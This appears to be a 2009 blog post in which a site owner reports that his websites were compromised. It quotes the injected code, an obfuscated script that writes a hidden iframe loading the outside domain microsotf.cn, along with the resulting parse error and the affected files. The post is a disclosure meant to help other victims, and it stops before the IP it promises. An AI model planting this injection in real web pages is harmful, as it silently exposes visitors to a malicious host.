Web site hack loading microsotf.cn

Filed Under Hacks and Mods on 2009-07-06, 15:21

I came back from vacation to find that some of my sites had been compromised. If you’re also someone who has websites that have been compromised with an iframe loading microsotf.cn, please join the conversation on freenode (chat.freenode.com) in #microsotf.cn If you don’t have an irc client, you can use the webchat. Here are some symptoms that hopefully Google will index and help you find this post:

The inserted code:

echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>';

The syntax error that appears:

Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ',' or ';'

It appears the affected files are index.php index.html and login.php.

This is the IP you should block the hell out of: